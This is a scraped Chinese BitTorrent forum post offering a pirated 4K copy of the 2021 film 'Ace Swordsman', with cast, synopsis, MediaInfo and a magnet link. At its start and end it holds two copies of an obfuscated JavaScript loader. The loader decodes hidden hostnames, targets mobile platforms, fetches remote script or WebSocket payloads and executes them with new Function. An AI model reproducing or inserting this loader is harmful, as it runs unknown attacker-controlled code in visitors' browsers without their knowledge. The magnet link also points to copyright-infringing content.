王牌剑客[国语配音/中文字幕].Ace.Swordsman.2021.2160p.WEB-DL.H265.DDP2.0 1.30GB

版主小s 1月前 368

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 王牌剑客 / 王牌剑客:逗舞戏诸侯

◎年 代 2021

◎产 地 中国大陆

◎类 别 喜剧 / 武侠

◎语 言 汉语普通话

◎上映日期 2021-10-14(中国大陆)

◎IMDb链接 https://www.imdb.com/title//

◎豆瓣链接 https://movie.douban.com/subject/33383341/

◎演 员 陈汉典 Han Dian Chen (id:1274546)

杨青倩 Qingqian Yang (id:1324236)

◎标 签 陈汉典 / 喜剧 / 古装

◎简 介

动乱年代,六国纷争,金国王爷勾结曌国派出天下第一剑客企图刺杀和平之主——金王,却被本想在舞坛一展雄姿的张简客扰乱,张简客更是误打误撞“被”成为天下第一剑客,从而遭到追杀。四处逃难的张简客误闯进以金王为死敌的寡妇军,进退两难。天性痞贱的他不畏困境,一路过关斩将,还顺便泡了美貌间谍女,最后还在金王面前大大地逞了次英雄。但是,政事复杂,帝心似海,这个充满欺骗、算计、血腥的权势之争,远远不是单纯的张简客能理解的。

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 191156328014557998055719026810877243229 (0x8FCF5E9F4CF591C194E81094058DEF5D)

  4. Complete name : 王牌剑客[email protected]v

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 1.30 GiB

  8. Duration : 1 h 19 min

  9. Overall bit rate : 2 338 kb/s

  10. Encoded date : UTC 2021-10-14 06:13:51

  11. Writing application : mkvmerge v61.0.0 ('So') 64-bit

  12. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  13. Video

  14. ID : 1

  15. Format : HEVC

  16. Format/Info : High Efficiency Video Coding

  17. Format profile : [email protected]@Main

  18. Codec ID : V_MPEGH/ISO/HEVC

  19. Duration : 1 h 19 min

  20. Bit rate : 1 954 kb/s

  21. Width : 3 840 pixels

  22. Height : 1 554 pixels

  23. Display aspect ratio : 2.471

  24. Frame rate mode : Constant

  25. Frame rate : 25.000 FPS

  26. Color space : YUV

  27. Chroma subsampling : 4:2:0

  28. Bit depth : 8 bits

  29. Bits/(Pixel*Frame) : 0.013

  30. Stream size : 1.09 GiB (84%)

  31. Default : Yes

  32. Forced : No

  33. Color range : Limited

  34. Color primaries : BT.709

  35. Transfer characteristics : BT.709

  36. Matrix coefficients : BT.709


  37. Audio #1

  38. ID : 2

  39. Format : AAC LC

  40. Format/Info : Advanced Audio Codec Low Complexity

  41. Codec ID : A_AAC-2

  42. Duration : 1 h 19 min

  43. Bit rate : 125 kb/s

  44. Channel(s) : 2 channels

  45. Channel layout : L R

  46. Sampling rate : 48.0 kHz

  47. Frame rate : 46.875 FPS (1024 SPF)

  48. Compression mode : Lossy

  49. Delay relative to video : -42 ms

  50. Stream size : 71.4 MiB (5%)

  51. Language : Chinese

  52. Default : Yes

  53. Forced : No


  54. Audio #2

  55. ID : 3

  56. Format : E-AC-3

  57. Format/Info : Enhanced AC-3

  58. Commercial name : Dolby Digital Plus

  59. Codec ID : A_EAC3

  60. Duration : 1 h 19 min

  61. Bit rate mode : Constant

  62. Bit rate : 256 kb/s

  63. Channel(s) : 2 channels

  64. Channel layout : L R

  65. Sampling rate : 48.0 kHz

  66. Frame rate : 31.250 FPS (1536 SPF)

  67. Compression mode : Lossy

  68. Delay relative to video : -42 ms

  69. Stream size : 146 MiB (11%)

  70. Language : Chinese

  71. Service kind : Complete Main

  72. Default : Yes

  73. Forced : No




复制代码


TAGS 武侠 喜剧

磁力链:
  • magnet:?xt=urn:btih:2526D8DD7BCC550BA4369BFBF27A983E17E4A67C

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};